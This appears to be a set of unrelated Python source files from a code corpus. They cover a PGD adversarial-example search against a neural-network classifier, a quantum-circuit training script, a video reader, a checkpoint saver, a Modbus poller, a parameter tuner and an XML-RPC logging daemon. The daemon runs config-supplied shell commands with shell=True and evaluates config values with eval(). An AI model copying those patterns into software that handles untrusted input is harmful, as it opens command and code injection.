        g = tf.import_graph_def(graph_def, name='')
    # Logits tensor: the input of the graph's final operation.
    tf_out = sess.graph.get_operations()[-1].inputs[0]
    # Rewire the graph so it accepts a flat float64 784-vector named 'x'.
    tf_in_new = tf.placeholder( shape=(784), dtype=tf.float64, name='x' )
    tf_in_old = tf.reshape( tf_in_new, (1,1,1,784) )
    tf_in_old = tf.cast( tf_in_old, tf.float32 )
    tf_in = tf.get_default_graph().get_tensor_by_name( 'input:0' )
    tf_output = ge.graph_replace(tf_out, {tf_in: tf_in_old})
    tf_output = tf.cast( tf_output, tf.float64 )
    pgd_obj = create_pgd_graph( specLB, specUB, sess, tf_in_new, tf_output, i )
    for j in range( args.it ):
        # One PGD attempt within the module-level bounds.
        ex = pgd(sess, specLB, specUB, *pgd_obj, *pgd_args)
        # Bail out early if the parent already told us to die.
        status = conn.poll(0.001)
        if status:
            if conn.recv() == 'kill':
                return
        if np.argmax( sess.run( tf_output, feed_dict={tf_in_new: ex} )) == i:
            # Success: report the adversarial example, then wait for 'kill'.
            conn.send( (i,ex) )
            while True:
                status = conn.poll(1)
                if status:
                    if conn.recv() == 'kill':
                        return
    # No attack found within the iteration budget: report failure and wait.
    conn.send( (i,False) )
    while True:
        status = conn.poll(1)
        if status:
            if conn.recv() == 'kill':
                return
# --- Parent: fan out workers and poll until an attack is found (or all fail)
start = time.time()
print("img", args.im)
conns, procs = create_pool( corr_label, args )
# mapping[i] is True while worker i has not yet reported a result.
mapping = []
for conn in range( len( conns ) ):
    mapping.append( True )
while True:
    if not np.any( mapping ):
        break
    for i in range( len( conns ) ):
        conn = conns[i]
        if mapping[ i ]:
            status = conn.poll(0.1)
            if status:
                res = conn.recv()
                mapping[ i ] = False
                conn.send( 'kill' )
                if not ( res[1] is False ):
                    # First adversarial example wins: print it, kill the
                    # remaining workers, and exit immediately.
                    print( 'Attack found for', res[0], ':' )
                    print( res[1] )
                    for i in range( len( conns ) ):
                        if mapping[ i ]:
                            conn = conns[i]
                            conn.send( 'kill' )
                    for proc in procs:
                        proc.join()
                    end = time.time()
                    print(end - start, "seconds")
                    exit()
                #else:
                    #print( 'No attacks for', res[0] )
# Every worker reported failure.
print( 'No attacks' )
end = time.time()
print(end - start, "seconds")
|
linear_anstaz_w_multithread.py | import qiskit
import numpy as np
import sys
import qtm.base
import qtm.constant
import qtm.ansatz
import qtm.fubini_study
import qtm.encoding
import multiprocessing
def runw(num_layers, num_qubits):
    """Train a linear-ansatz circuit to prepare the |W> state via QNG descent.

    Runs 100 quantum-natural-gradient steps, then saves the loss curve,
    parameter history, traces and fidelities under
    ../experiments/linear_ansatz_w/<num_qubits>/.
    """
    # Explicit import: this module is used below but was not imported at the
    # top of the file.
    import qtm.loss
    thetas = np.ones(num_qubits * num_layers * 5)
    qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
    loss_values = []
    thetass = []
    for i in range(0, 100):
        if i % 20 == 0:
            print('Linear ansatz W: (' + str(num_layers) +
                  ',' + str(num_qubits) + '): ' + str(i))
        # Fubini-Study metric for the *same* W-checker circuit the gradient
        # uses.  (The original passed create_GHZchecker_linear here — a
        # copy/paste slip from the GHZ variant of this script.)
        G = qtm.fubini_study.qng(
            qc.copy(), thetas, qtm.ansatz.create_Wchecker_linear, num_layers)
        grad_loss = qtm.base.grad_loss(
            qc,
            qtm.ansatz.create_Wchecker_linear,
            thetas, r=1/2, s=np.pi/2, num_layers=num_layers)
        # Natural-gradient step: theta <- theta - lr * G^-1 grad.
        thetas = np.real(thetas - qtm.constant.learning_rate *
                         (np.linalg.inv(G) @ grad_loss))
        qc_copy = qtm.ansatz.create_Wchecker_linear(
            qc.copy(), thetas, num_layers)
        loss = qtm.loss.loss_fubini_study(qtm.base.measure(
            qc_copy, list(range(qc_copy.num_qubits))))
        loss_values.append(loss)
        thetass.append(thetas)
    np.savetxt("../experiments/linear_ansatz_w/" + str(num_qubits) +
               "/loss_values_qng.csv", loss_values, delimiter=",")
    np.savetxt("../experiments/linear_ansatz_w/" +
               str(num_qubits) + "/thetass_qng.csv", thetass, delimiter=",")
    traces = []
    fidelities = []
    for thetas in thetass:
        # Get |psi> = U_gen|000...>
        qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
        qc = qtm.ansatz.create_linear_state(qc, thetas, num_layers)
        psi, rho_psi = qtm.base.extract_state(qc)
        # Get |psi~> = U_target|000...>
        qc1 = qiskit.QuantumCircuit(num_qubits, num_qubits)
        qc1 = qtm.ansatz.create_w_state(num_qubits)
        psi_hat, rho_psi_hat = qtm.base.extract_state(qc1)
        # Calculate the metrics
        trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
        traces.append(trace)
        fidelities.append(fidelity)
    # Use the same lowercase directory as the files above (the original wrote
    # these last two files to "linear_ansatz_W", which is a *different*
    # directory on case-sensitive file systems).
    np.savetxt("../experiments/linear_ansatz_w/" +
               str(num_qubits) + "/traces_qng.csv", traces, delimiter=",")
    np.savetxt("../experiments/linear_ansatz_w/" + str(num_qubits) +
               "/fidelities_qng.csv", fidelities, delimiter=",")
if __name__ == "__main__":
    # Launch one worker process per qubit count, all with the same depth.
    num_layers = 2
    workers = [
        multiprocessing.Process(target=runw, args=(num_layers, n))
        for n in [2, 3, 4, 5, 6, 7, 8, 9, 10]
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    print("Done!")
|
videoreader.py | from threading import Thread
import sys
import time
import numpy as np
import ffmpeg
width = 1280
height = 720
class VideoReader:
    """Background video frame reader backed by an ffmpeg rawvideo pipe.

    Decodes the file at ``path`` into RGB frames (module-level ``width`` x
    ``height``) on a daemon thread, keeping only the most recent frame and
    pacing delivery at roughly ``fps`` frames per second.
    """

    def __init__(self, path, fps):
        self.stopped = False     # set once the stream is exhausted
        self.frame = None        # most recent decoded frame, (height, width, 3) uint8
        self.path = path
        self.fps = fps
        self.process = None      # ffmpeg subprocess handle (set in start())
        self.frames = 0          # number of frames decoded so far
        self.firstFrame = False  # True once at least one frame was decoded

    def start(self):
        """Spawn ffmpeg and the reader thread; returns self for chaining."""
        # Start ffmpeg output and read it from stdout
        self.process = (
            ffmpeg
            .input(self.path)
            .output('pipe:', format='rawvideo', pix_fmt='rgb24')
            .run_async(pipe_stdout=True)
        )
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self

    def update(self):
        """Reader loop: pull raw frames from ffmpeg's stdout, throttled to fps."""
        lastFrameTime = 0
        while True:
            # One raw RGB frame is exactly width * height * 3 bytes.
            in_bytes = self.process.stdout.read(width * height * 3)
            if not in_bytes:
                # EOF: ffmpeg finished (or the pipe was closed).
                self.stop()
                return
            self.firstFrame = True
            frame = (
                np
                .frombuffer(in_bytes, np.uint8)
                .reshape([height, width, 3])
            )
            self.frame = frame
            self.frames += 1
            # Sleep away the remainder of the frame interval so frames are
            # published at roughly self.fps.
            frameTime = time.time() - lastFrameTime
            if lastFrameTime != 0 and frameTime < 1 / self.fps:
                time.sleep(max(1 / self.fps - frameTime, 0))
            lastFrameTime = time.time()

    def read(self):
        """Return the latest frame (None until the first frame arrives)."""
        return self.frame

    def more(self):
        """True while the stream is alive and at least one frame was decoded."""
        return not self.stopped and self.firstFrame

    def stop(self):
        """Mark the reader stopped and shut down the ffmpeg process."""
        print('STOP'*10)
        self.stopped = True
        self.process.stdout.close()
        self.process.wait()
|
async_save.py | import torch
from torch.multiprocessing import Process
import numpy as np
import logging
from collections import OrderedDict
from typing import Any, Dict
logger = logging.getLogger(__name__)
def copy_cpu_state_dict(states: Any) -> Dict[str, Any]:
    """Recursively copy a (possibly nested) state structure, moving tensors to CPU.

    Dicts are rebuilt as OrderedDicts, lists element-wise; tensors are moved
    to CPU via ``.cpu()``; ints/floats/strings/tuples/None pass through
    unchanged.  Any other type is passed through with a warning.

    NOTE: tuples are passed through as-is, so a tuple *containing* CUDA
    tensors is not copied to CPU — matches the original behavior.
    """
    # need a new dict
    result_states = OrderedDict()
    if isinstance(states, dict):
        # recursion
        for k in states:
            result_states[k] = copy_cpu_state_dict(states[k])
    elif isinstance(states, list):
        result_states = [copy_cpu_state_dict(item) for item in states]
    elif isinstance(states, torch.Tensor):
        # If it is torch.Tensor, copy to cpu first
        result_states = states.cpu()
    elif isinstance(states, (int, float, str, tuple, type(None))):
        result_states = states
    else:
        result_states = states
        # Use the module logger and .warning(): logging.warn is deprecated and
        # went to the root logger, bypassing this module's configuration.
        logging.getLogger(__name__).warning(
            f"`copy_cpu_state_dict` cannot parse {type(states)}")
    # print(f"`copy_cpu_state_dict` cannot parse {type(states)}")
    return result_states
def _save(states: OrderedDict, filename):
    """Persist *states* to *filename*; runs in the background save process.

    Returns 0 so the child process exits cleanly.
    """
    torch.save(states, filename)
    return 0
def async_save(model_states: OrderedDict, filename) -> Process:
    """Snapshot *model_states* to CPU and save it to *filename* in a background process.

    Returns the started ``Process``; pass it to :func:`async_wait` (or call
    ``.join()``) to block until the save completes.  The process is a daemon,
    so it is killed if the parent exits before the save finishes.
    """
    # Copy tensors to CPU up front so the child never touches CUDA state.
    model_states = copy_cpu_state_dict(model_states)
    # daemon=True is set once in the constructor; the original also
    # re-assigned p.daemon afterwards, which was redundant.
    p = Process(target=_save, args=(model_states, filename), daemon=True)
    p.start()
    return p
def async_wait(process: Process):
    """Block until the background save process started by async_save() finishes."""
    process.join()
damarisd.py | import tables as T
import numpy as N
import subprocess
import threading
import SimpleXMLRPCServer
import SocketServer
import time,xmlrpclib,httplib
import cPickle as pickle
import ConfigParser
import sys, os
import imp
# xmlrpc mit timeout
def Server(url, *args, **kwargs):
    """Build an xmlrpclib server proxy whose HTTP transport honours a timeout.

    Accepts an optional ``timeout`` keyword (seconds, default 60); all other
    arguments are forwarded to xmlrpclib.Server unchanged.
    """
    transport = TimeoutTransport()
    # Consume the timeout kwarg so xmlrpclib.Server never sees it.
    transport.timeout = kwargs.pop('timeout', 60)
    kwargs['transport'] = transport
    return xmlrpclib.Server(url, *args, **kwargs)
class TimeoutTransport(xmlrpclib.Transport):
    """xmlrpclib transport whose HTTP connections honour a socket timeout.

    Set ``.timeout`` (seconds) before use; the Server() factory above does this.
    """
    def make_connection(self, host):
        conn = TimeoutHTTP(host)
        conn.set_timeout(self.timeout)
        return conn
class TimeoutHTTPConnection(httplib.HTTPConnection):
    """HTTPConnection that applies ``self.timeout`` to its socket."""
    def connect(self):
        httplib.HTTPConnection.connect(self)
        # The socket only exists after connect(); set the timeout now.
        self.sock.settimeout(self.timeout)
class TimeoutHTTP(httplib.HTTP):
    """httplib.HTTP whose underlying connection is a TimeoutHTTPConnection."""
    _connection_class = TimeoutHTTPConnection
    def set_timeout(self, timeout):
        # Forward the timeout to the wrapped connection object.
        self._conn.timeout = timeout
# Create server
# SocketServer.ThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer
#class ThreadingXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer): pass
# Threaded XML-RPC server: ThreadingMixIn handles each request in its own thread.
class ThreadingXMLRPCServer(SocketServer.ThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer): pass
#class ThreadingXMLRPCServer(SocketServer.ThreadingTCPServer, SimpleXMLRPCServer.SimpleXMLRPCServer): pass
#class ThreadingXMLRPCServer(SocketServer.TCPServer, SimpleXMLRPCServer.SimpleXMLRPCDispatcher):
# def __init__(self, addr, requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler, logRequests = 0):
# self.logRequests = logRequests
# if sys.version_info[:2] < (2, 5):
# SimpleXMLRPCServer.SimpleXMLRPCDispatcher.__init__(self)
# else:
# SimpleXMLRPCServer.SimpleXMLRPCDispatcher.__init__(self, allow_none = False, encoding = None)
# SocketServer.ThreadingTCPServer.__init__(self, addr, requestHandler)
# pass
# The Damaris Logger Daemon
class DamarisLogger:
    """XML-RPC daemon that logs timestamped device data into an HDF5 file.

    Clients register themselves, push rows via put_data()/put_external_data()
    and read time ranges back via get_data().  A threading.Lock guards the put
    counters; the HDF5 file is flushed to disk every max_puts_before_flush puts.
    """
    def __init__(self, data_file, max_puts_before_flush,port):
        #print os.getcwd()
        # Open (or create) the HDF5 data file in append mode.
        self.hdf = T.openFile(data_file,'a')
        self.run_flag = True
        # Threaded XML-RPC server bound to localhost only.
        self.server = ThreadingXMLRPCServer(("localhost", port), logRequests=0)
        self.server.allow_reuse_address = True
        self.server.allow_none = True
        self.server.allow_introspection = True
        # NOTE(review): register_introspection_functions is a *method*;
        # assigning True to it does not register anything — confirm intent.
        self.server.register_introspection_functions=True
        # Exported RPC methods.
        self.server.register_function(self.put_data)
        self.server.register_function(self.get_data)
        self.server.register_function(self.put_external_data)
        self.server.register_function(self.unblock_client)
        self.server.register_function(self.block_client)
        self.server.register_function(self.occupied)
        self.server.register_function(self.quit)
        self.server.register_function(self.quit_client)
        self.server.register_function(self.status)
        self.server.register_function(self.register_client)
        self.server.register_function(self.unregister_client)
        self.server.register_function(self.quit_device)
        self.server.register_function(self.server_run)
        self.puts = 0                  # puts since the last flush
        self.total_puts = 0            # puts since startup
        self.block_list = set()        # devices whose logging is paused
        self.quit_list = set()         # devices individually told to quit
        self.quit_client_flag = False  # tells *all* clients to quit
        self.client_list = set()       # currently registered devices
        self.max_puts_before_flush = max_puts_before_flush
        self.lock = threading.Lock()   # guards puts / total_puts
    def __del__(self):
        # Best-effort close of the HDF5 file on teardown.
        try:
            print "closing files ..."
            self.hdf.flush()
            self.hdf.close()
        except:
            print "Could not close files, sorry!"
    def register_client(self,device):
        # Remember that `device` is actively logging.
        self.client_list.add(device)
        return None
    def unregister_client(self,device):
        self.client_list.remove(device)
        return None
    def flushing(self):
        # Flush HDF5 to disk once enough puts have accumulated.
        self.lock.acquire()
        if self.puts >= self.max_puts_before_flush:
            self.hdf.flush()
            self.puts = 0
        self.lock.release()
        return None
    def server_run(self):
        # Polled by clients: becomes False once shutdown has begun.
        return self.run_flag
    def quit(self):
        #self.run_flag = False
        # Ask all clients to quit, wait up to ~5 s for them, then shut down.
        self.quit_client_flag = True
        i = 0
        while (i < 10) and not len(self.client_list) == 0:
            i += 1
            print "Clients still running ...", self.client_list
            time.sleep(0.5)
        self.__del__()
        self.run_flag = False
        return None
    def status(self):
        # Opportunistic flush, then report counters and client/block lists.
        self.flushing()
        return self.total_puts, list(self.client_list), list(self.block_list)
    def quit_device(self,device):
        """
        Tell client 'device' to quit
        """
        self.quit_list.add(device)
        return None
    ######## client controls ###############
    def quit_client(self, device):
        """
        Should the client 'device' quit?
        """
        # Individual quit requests are one-shot (removed once delivered).
        if device in self.quit_list:
            self.quit_list.remove(device)
            return True
        if self.quit_client_flag:
            return self.quit_client_flag
    def occupied(self,device):
        # True while `device` is blocked from logging.
        if device in self.block_list:
            return True
        else:
            return False
    def block_client(self,device):
        self.block_list.add(device)
        return None
    def unblock_client(self,device):
        self.block_list.remove(device)
        return None
    ########################################
    def run(self):
        """
        This function is starting the server and registering the needed functions
        """
        print "Server up and running ..."
        while self.run_flag:
            self.server.handle_request()
    def put_external_data(self, device, command):
        """
        Reads data from an external (shell) command
        """
        record_time = time.time()
        # HACK: shell=True runs the configured command through the shell —
        # acceptable only because commands come from the local config file.
        external = subprocess.Popen(command, shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        in_data = external.stdout.readline()
        # result = map(float, in_data.strip().split(' '))
        # Much faster!
        result = N.fromstring("".join(in_data), sep=' ')
        self.put_data(device, record_time, result)
        return 1
    def put_data(self, device, record_time, data):
        """
        Put in data via an external program. The program should connect to the
        DAMARISd daemon and issue this command.
        record_time is a list of timestamps, from for example time.time().
        value is a cPickle.dumps(numpy.array), each row corresponds to a
        time stamp
        """
        def make_EArray(device,cols):
            # Fetch the per-device extendable array, creating it on first use
            # (one extra leading column holds the timestamp).
            try:
                self.hdf.root._g_checkHasChild(device) # throws NoSuchNodeError if not existing
                device_array = self.hdf.getNode('/',device)
            except T.exceptions.NoSuchNodeError:
                device_array = self.hdf.createEArray('/',device,
                                                     atom=T.Float64Atom(),
                                                     shape=(0,cols+1))
            return device_array
        # Check the type of record_time, we need one dimensional data
        if type(record_time) != list:
            # if a numpy array
            if type(record_time) == N.ndarray:
                # NOTE(review): all(shape) is a bool, so "> 1" is always False
                # and this flatten never runs — confirm intent.
                if all(record_time.shape) > 1:
                    # we need one dimensional time data, thus flatten
                    record_time = record_time.flatten()
            # not a numpy array, make a list out of it
            #else:
            #    record_time = list(record_time)
        # Data comes from outside client via xmlrpclib
        if type(data) == str:
            data = pickle.loads(data)
        # rows, cols for creating the pytables array
        rows_cols = data.shape
        # is one dimension
        if len(rows_cols) == 1:
            rows = 1
            cols = rows_cols[0]
        # is two dimensinal
        if len(rows_cols) == 2:
            rows,cols = rows_cols
        else:
            # todo error handling
            pass
        device_array = make_EArray(device,cols)
        # First column is the timestamp; remaining columns are the data.
        rows = N.empty((rows,cols+1))
        rows[:,0]=record_time
        rows[:,1:]=data
        try:
            device_array.append(rows)
        except:
            print "ERROR! Quitting client: %s"%device
            self.quit_device(device)
        # update puts, flush if necessary
        self.lock.acquire()
        self.total_puts += 1
        self.puts += 1
        self.lock.release()
        self.flushing()
        return None
    def search(self,anarray,value,start=None,stop=None):
        """
        Binary search, needs ~ 23 iterations for 12e6 records
        """
        # Searches column 0 (the timestamps) of `anarray` for `value` and
        # returns the row index where it approximately sits.
        Found = False
        if start == None:
            start = 0
        if stop == None:
            stop = anarray.shape[0]
        bisect = (stop+start)/2
        current_point = anarray.read(start=bisect)[:,0]
        while not Found:
            if value < current_point:
                stop = bisect-1
            elif value > current_point:
                start = bisect+1
                # can't go higher
                if start >= anarray.shape[0]:
                    start=bisect
            bisect = (stop+start)/2
            # Clamp the pivot into the valid row range.
            if bisect >= anarray.shape[0]:
                bisect = anarray.shape[0]
            if bisect < 0:
                bisect = 0
            current_point = anarray.read(start=bisect)[:,0]
            if start >= stop:
                Found = True
        return bisect
    def get_data(self, device, start_time, stop_time):
        # Return the rows of `device` between the two timestamps, pickled.
        self.hdf.flush()
        device_array = self.hdf.getNode('/',device)
        # select the values in timeframe
        # This is very inefficient
        #tmp = [ x[:] for x in device_array.iterrows()
        #        if (start_time <= x[0] <= stop_time) ]
        #values_to_return = N.empty((len(tmp), len(tmp[0])))
        #for i,row in enumerate(tmp):
        #    values_to_return[i,:]=row
        # using binary search
        start_point = self.search(device_array,start_time)
        # don't search the whole thing again, start at start_point
        end_point = self.search(device_array,stop_time, start = start_point-1)
        #print start_point, end_point,device
        if start_point == end_point:
            values_to_return = device_array.read(start_point)
        else:
            values_to_return = device_array.read(start_point, end_point)
        # Protocol 0 keeps the payload ASCII-safe for xmlrpclib transport.
        return_object = pickle.dumps(values_to_return, protocol=0)
        return return_object
def damarisd_daemon():
    """Main daemon: read damarisd.config, start the DamarisLogger server thread
    and one client thread per configured device, then idle until shutdown."""
    s = "%s Starting server"%(time.ctime())
    print
    print len(s)*"#"
    print s
    print len(s)*"#"
    ############ GENERAL CONFIGURATION PART ###################
    config = ConfigParser.ConfigParser()
    config.read('damarisd.config')
    devices = [sec for sec in config.sections()]# if sec!="general"]
    data_file = config.defaults()['data_file']
    max_puts_before_flush = int(config.defaults()['max_puts_before_flush'])
    port = int(config.defaults()['port'])
    # log the config
    for sec in config.sections():
        print "Device: %s"%sec
        for pair in sorted(config.items(sec)):
            keys,val = pair
            print "\t%s = %s"%pair
    ############## SERVER PART ######################
    damarisd_server = DamarisLogger(data_file,max_puts_before_flush,port)
    daemon = threading.Thread(target = damarisd_server.run)
    daemon.setDaemon(True)
    daemon.start()
    # move this to background daemon.run()
    # Give the server a moment to bind before clients connect.
    time.sleep(0.1)
    server = Server('http://localhost:%i'%port)
    ######### CLIENT PART ############
    def shelldevice_thread(device, command,rate):
        # Poll a shell-command device every `rate` seconds until told to quit.
        Quit = False
        #server = xmlrpclib.Server('http://localhost:%i'%port)
        server.register_client(device)
        while not Quit:
            Quit = bool(server.quit_client(device))
            if server.occupied(device) == 0:
                server.put_external_data(device, command)
            time.sleep(rate)
        server.unregister_client(device)
    def pydevice_thread(device, module, arg_list):
        """
        Python module interface.
        All the logic has to be in the client module.
        On start:
        a) server.register_client(device)
        b) server.put_data
        c) check server.occupied
        d) check server.quit_client flag
        On quitting:
        a) last transmission
        b) server.unregister_client(device)
        """
        fm = imp.find_module(module)
        mod = imp.load_module(module, fm[0],fm[1],fm[2])
        mod.doit(server, device, arg_list)
    # start the device logger
    # distinguish between shell commands and python scripts
    ################### CLIENT CONFIGURATION ###########################
    shelldevices = [dev for dev in devices if config.has_option(dev,'command')]
    pydevices = [dev for dev in devices if config.has_option(dev,'module')]
    for device in shelldevices:
        command = config.get(device,'command')
        rate = config.getfloat(device,'rate')
        cmd = threading.Thread(target = shelldevice_thread, args = (device,command,rate))
        cmd.setName("Thread_%s"%device)
        cmd.setDaemon(True)
        cmd.start()
    for device in pydevices:
        module = config.get(device,'module')
        # HACK: eval() on a config value — only safe because the config file
        # is local and trusted.
        argument_list = eval(config.get(device,'args'))
        #print argument_list
        cmd = threading.Thread(target = pydevice_thread, args = (device,module,argument_list))
        cmd.setName("Thread_%s"%device)
        cmd.setDaemon(True)
        cmd.start()
    # endless loop
    run = True
    # server = xmlrpclib.Server('http://localhost:8002')
    # Idle until the server reports shutdown (or becomes unreachable).
    while run:
        time.sleep(2)
        try:
            run = server.server_run()
        except:
            run = False
            pass
# DAMONIZE from chris python page
#!/usr/bin/env python
###########################################################################
# configure UID and GID of server
# (currently unused: the seteuid/setegid calls in main() are commented out)
UID = 501
GID = 501
# configure these paths:
LOGFILE = '/Users/markusro/Projects/DAMARISd/damarisd.log'
PIDFILE = '/Users/markusro/Projects/DAMARISd/damarisd.pid'
# and let USERPROG be the main function of your project
USERPROG = damarisd_daemon
###########################################################################
#based on Juergen Hermanns http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
class Log:
    """File-like writer that flushes after every write.

    Guarantees that everything is logged even during an unexpected exit,
    at the cost of one flush per write.
    """

    def __init__(self, f):
        self.f = f

    def write(self, s):
        # Delegate the write, then force it to disk immediately.
        self.f.write(s)
        self.f.flush()
def main():
    """Daemon body: chdir to the data directory, redirect all output to the
    logfile, then run USERPROG (the damarisd daemon)."""
    #change to data directory if needed
    os.chdir("/Users/markusro/Projects/DAMARISd")
    #redirect outputs to a logfile
    sys.stdout = sys.stderr = Log(open(LOGFILE, 'a+'))
    #ensure the that the daemon runs a normal user
    #os.setegid(GID) #set group first "pydaemon"
    #os.seteuid(UID) #set user "pydaemon"
    #start the user program here:
    USERPROG()
if __name__ == "__main__":
    # do the UNIX double-fork magic, see Stevens' "Advanced
    # Programming in the UNIX Environment" for details (ISBN 0201563177)
    try:
        pid = os.fork()
        if pid > 0:
            # exit first parent
            sys.exit(0)
    except OSError, e:
        print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
        sys.exit(1)
    # decouple from parent environment
    os.chdir("/") #don't prevent unmounting....
    os.setsid()
    os.umask(0)
    # do second fork
    try:
        pid = os.fork()
        if pid > 0:
            # exit from second parent, print eventual PID before
            print "Daemon PID %d" % pid
            open(PIDFILE,'w').write("%d"%pid)
            sys.exit(0)
        # NOTE(review): this second print runs in the *child*, where pid == 0,
        # so it prints "Daemon PID 0" — presumably a leftover duplicate.
        print "Daemon PID %d" % pid
    except OSError, e:
        print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
        sys.exit(1)
    # start the daemon main loop
    main()
|
modbus_thread.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# modbus_thread
# start a thread for polling a set of registers, display result on console
# exit with ctrl+c
import time
from threading import Thread, Lock
from pyModbusTCP.client import ModbusClient
SERVER_HOST = "localhost"
SERVER_PORT = 502
# set global
regs = []
# init a thread lock
regs_lock = Lock()
# modbus polling thread
def polling_thread():
    """Continuously poll 10 holding registers and publish them into `regs`.

    Runs forever; reconnects the TCP session whenever it drops and rewrites
    the shared `regs` list under `regs_lock` after each successful read.
    """
    global regs
    client = ModbusClient(host=SERVER_HOST, port=SERVER_PORT)
    while True:
        # keep TCP open
        if not client.is_open():
            client.open()
        # do modbus reading on socket
        words = client.read_holding_registers(0, 10)
        # Publish a copy under the lock so readers never see a partial update.
        if words:
            with regs_lock:
                regs = list(words)
        # 1s before next polling
        time.sleep(1)
# start polling thread
tp = Thread(target=polling_thread)
# set daemon: polling thread will exit if main thread exit
tp.daemon = True
tp.start()
# display loop (in main thread): print the shared register list once a second
while True:
    # print regs list (with thread lock synchronization)
    with regs_lock:
        print(regs)
    # 1s before next print
    time.sleep(1)
|
fit.py | #!/usr/bin/env python3
import itertools
import json
import random
from threading import Thread
from tqdm import tqdm, tnrange
from sword import morphology_map, where_da_sword
def iou(a, b, epsilon=1e-5):
    """Intersection-over-union of two axis-aligned boxes (x1, y1, x2, y2).

    Returns 0.0 for disjoint boxes; `epsilon` keeps the division stable when
    both boxes are degenerate.
    """
    # Corners of the intersection rectangle.
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    w = ix2 - ix1
    h = iy2 - iy1
    # Negative extent on either axis means the boxes do not overlap at all.
    if w < 0 or h < 0:
        return 0.0
    overlap = w * h
    # Union = sum of the individual areas minus the shared area.
    area_a = (a[2] - a[0]) * (a[3] - a[1])
    area_b = (b[2] - b[0]) * (b[3] - b[1])
    union = area_a + area_b - overlap
    return overlap / (union + epsilon)
def load_data(i):
    """Read ground-truth boxes from ./train/out<i>.txt.

    Each line is semicolon-separated integers; '#' marks an unknown field and
    is mapped to -1.  Returns a list of int tuples, one per line.
    """
    rows = []
    with open("./train/out{0!s}.txt".format(i)) as f:
        for raw in f:
            cleaned = raw.replace("\n", "").replace("#", "-1")
            rows.append(tuple(int(tok) for tok in cleaned.split(";")))
    return rows
def validate(j, params, iou_for_params):
    """Score `params` on training clip j and append the clip's mean IoU.

    Results are appended to the shared `iou_for_params` list so that several
    validate() calls can run on separate threads.
    """
    expected = load_data(j)
    scores = []
    clip = "./train/in{0!s}.mp4".format(j)
    for idx, frame in enumerate(where_da_sword(clip, expected[0], params)):
        scores.append(iou(expected[idx], frame))
    iou_for_params.append(sum(scores) / len(scores))
if __name__ == '__main__':
    # Baseline: score the current config.json across the 8 training clips.
    with open("config.json", "r") as f:
        best_params = dict(json.load(f))
    best_iou = []
    threads = []
    for j in range(1, 9, 1):
        threads.append(
            Thread(target=validate, args=(j, best_params, best_iou)))
    for t in threads:
        t.start()
    for t in tqdm(threads):
        t.join()
    best_iou = sum(best_iou) / len(best_iou)
    print("Best IoU: {0!s}".format(best_iou))
    # Neighbourhoods for the random search: absolute choices for the kernel
    # sizes, additive deltas for the Canny/Hough parameters.
    blur_kernel_size = [i for i in range(3, 6, 2)]
    canny_threshold1 = [i for i in range(-1, 2, 1)]
    canny_threshold2 = [i for i in range(-1, 2, 1)]
    hough_rho = [i / 10000.0 for i in range(-100, 101, 10)]
    hough_threshold = [i for i in range(-1, 2, 1)]
    hough_minLineLength = [i for i in range(-1, 2, 1)]
    hough_maxLineGap = [i for i in range(-1, 2, 1)]
    # NOTE(review): morphology_method is built but never used below — the
    # search keeps best_params["morphology_method"] fixed; confirm intent.
    morphology_method = [i for i in morphology_map.keys()]
    morphology_kernel = [i for i in range(3, 8, 2)]
    morphology_iter = [i for i in range(0, 3, 1)]
    # Random local search: perturb the best parameters, evaluate all clips in
    # parallel, and keep the perturbation whenever the mean IoU improves.
    for _ in tqdm(range(10000)):
        params = {
            "deque_maxlen": best_params["deque_maxlen"],
            "blur_kernel_size": random.choice(blur_kernel_size),
            "canny_threshold1": best_params["canny_threshold1"] + random.choice(canny_threshold1),
            "canny_threshold2": best_params["canny_threshold2"] + random.choice(canny_threshold2),
            "hough_rho": best_params["hough_rho"] + random.choice(hough_rho),
            "hough_threshold": best_params["hough_threshold"] + random.choice(hough_threshold),
            "hough_minLineLength": best_params["hough_minLineLength"] + random.choice(hough_minLineLength),
            "hough_maxLineGap": best_params["hough_maxLineGap"] + random.choice(hough_maxLineGap),
            "morphology_method": best_params["morphology_method"],
            "morphology_kernel": random.choice(morphology_kernel),
            "morphology_iter": random.choice(morphology_iter)
        }
        # print(params["hough_maxLineGap"])
        # print(params["hough_minLineLength"])
        # print(params["hough_rho"])
        # print(params["hough_threshold"])
        threads = []
        iou_for_params = []
        for j in range(1, 9, 1):
            threads.append(Thread(target=validate, args=(j, params, iou_for_params)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        iou_for_params = sum(
            iou_for_params) / len(
            iou_for_params)
        if iou_for_params > best_iou:
            best_params = params
            best_iou = iou_for_params
            print(
                "Better IoU: {0!s}".format(
                    best_iou))
            # Persist every improvement immediately.
            with open("config.json", "w") as f:
                json.dump(best_params, f)
|
test_concurrent_transaction.py | from nose.plugins.attrib import attr
from test.integration.base import DBTIntegrationTest
import threading
class BaseTestConcurrentTransaction(DBTIntegrationTest):
    """Shared harness: run long f_sleep() selects on background threads while
    `dbt run` executes concurrently, then assert every query ended 'good'."""
    def reset(self):
        # Per-relation state machine: wait -> good | bad | error: <msg>
        self.query_state = {
            'view_model': 'wait',
            'model_1': 'wait',
        }
    @property
    def schema(self):
        return "concurrent_transaction_032"
    @property
    def project_config(self):
        return {
            "macro-paths": ["test/integration/032_concurrent_transaction_test/macros"],
            "on-run-start": [
                "{{ create_udfs() }}",
            ],
        }
    def run_select_and_check(self, rel, sql):
        # Executed on a worker thread; records the outcome in query_state.
        try:
            res = self.run_sql(sql, fetch='one')
            # The result is the output of f_sleep(), which is True
            if res[0] == True:
                self.query_state[rel] = 'good'
            else:
                self.query_state[rel] = 'bad'
        except Exception as e:
